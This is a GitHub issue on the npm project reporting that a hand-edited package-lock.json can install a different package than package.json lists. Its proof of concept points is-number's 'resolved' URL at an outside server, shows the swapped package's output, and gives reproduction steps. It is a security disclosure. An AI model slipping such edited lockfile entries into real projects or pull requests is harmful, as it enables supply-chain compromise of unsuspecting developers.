Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] Lockfile dependency injection #4447

Closed
2 tasks done
hexnickk opened this issue Feb 20, 2022 · 1 comment
Closed
2 tasks done

[BUG] Lockfile dependency injection #4447

hexnickk opened this issue Feb 20, 2022 · 1 comment
Labels
Bug thing that needs fixing Needs Triage needs review for next steps Release 8.x work is associated with a specific npm 8 release

Comments

@hexnickk
Copy link

hexnickk commented Feb 20, 2022

Is there an existing issue for this?

  • I have searched the existing issues

This issue exists in the latest npm version

  • I am using the latest npm

Current Behavior

This is a follow-up to these articles:

In short words, it's possible to manually update lockfile, so it will install a different package than listed in package.json.

package.json

{
  "name": "malicious-lockfile",
  "version": "1.0.0",
  "main": "index.js",
  "dependencies": {
    "is-number": "^7.0.0"
  }
}

package-lock.json

{
  "name": "malicious-lockfile",
  "version": "1.0.0",
  "lockfileVersion": 2,
  "requires": true,
  "packages": {
    "": {
      "name": "malicious-lockfile",
      "version": "1.0.0",
      "dependencies": {
        "is-number": "^7.0.0"
      }
    },
    "node_modules/is-number": {
      "version": "7.0.0",
      "resolved": "https://kozlovzxc.ru/static/is-number-7.0.0.tgz",
      "integrity": "sha512-VFNyA7hugXJ/lnZGGIPNLValf7+Woij3nfhZv27IGB2U/ytqDv/GwusnbS2MvswTTjct1HV5I+vBe7RVIoo+Cw==",
      "engines": {
        "node": ">=0.12.0"
      }
    }
  },
  "dependencies": {
    "is-number": {
      "version": "7.0.0",
      "resolved": "https://kozlovzxc.ru/static/is-number-7.0.0.tgz",
      "integrity": "sha512-VFNyA7hugXJ/lnZGGIPNLValf7+Woij3nfhZv27IGB2U/ytqDv/GwusnbS2MvswTTjct1HV5I+vBe7RVIoo+Cw=="
    }
  }
}

index.js

const isNumber = require("is-number");

console.log(isNumber(1));

console output

➜  npm git:(master) ✗ ls
index.js          package-lock.json package.json

➜  npm git:(master) ✗ npm install
added 1 package, and audited 2 packages in 909ms
found 0 vulnerabilities

➜  npm git:(master) ✗ node index.js
Hello world 🌎. (malicious package output)
true (expected output)

The issue is that for open source packages, PR updating lockfile may look like this:
image

So probably no one will ever look into this.


Related pnpm issue pnpm/pnpm#4361
Related yarn discussion yarnpkg/berry#4136

Expected Behavior

It would be nice to have some way to check validity of lock file, so users can run this validation as a part of CI checks.

Probably it's something not expected in most cases when package.json has list of packages, but actual path for one of them in lockfile is updated.

Steps To Reproduce

  1. Install some package npm install is-number.
  2. Copy sources cp node_modules/is-number assets.
  3. Update sources to do something unusual, e.g. (console.log('hello world 🌎 ')).
  4. Pack new package npm pack --json.
  5. Distribute new package via http-server or publishing somewhere.
  6. Update lockfile path & integrity.
  7. Remove node_modules.
  8. Install everything again npm install.
  9. Run sample code (check example above).

Environment

  • npm: 8.3.1
  • Node.js: v17.4.0
  • OS Name: MacOS Montrey
  • System Model Name:
  • npm config:
; "builtin" config from /usr/local/lib/node_modules/npm/npmrc

prefix = "/usr/local"

; node bin location = /usr/local/Cellar/node/17.4.0/bin/node
; cwd = /Users/kozlovzxc/Projects/reasearch-lockfiles/examples/npm
; HOME = /Users/kozlovzxc
; Run `npm config ls -l` to show all defaults.
@hexnickk hexnickk added Bug thing that needs fixing Needs Triage needs review for next steps Release 8.x work is associated with a specific npm 8 release labels Feb 20, 2022
@fritzy
Copy link
Contributor

fritzy commented Feb 24, 2022

This is a feature request, so feel free to discuss it in the RFCS repo (https://github.com/npm/rfcs). I've opened an issue there for discussion. Please participate there. npm/rfcs#539.

@fritzy fritzy closed this as completed Feb 24, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Bug thing that needs fixing Needs Triage needs review for next steps Release 8.x work is associated with a specific npm 8 release
Projects
None yet
Development

No branches or pull requests

2 participants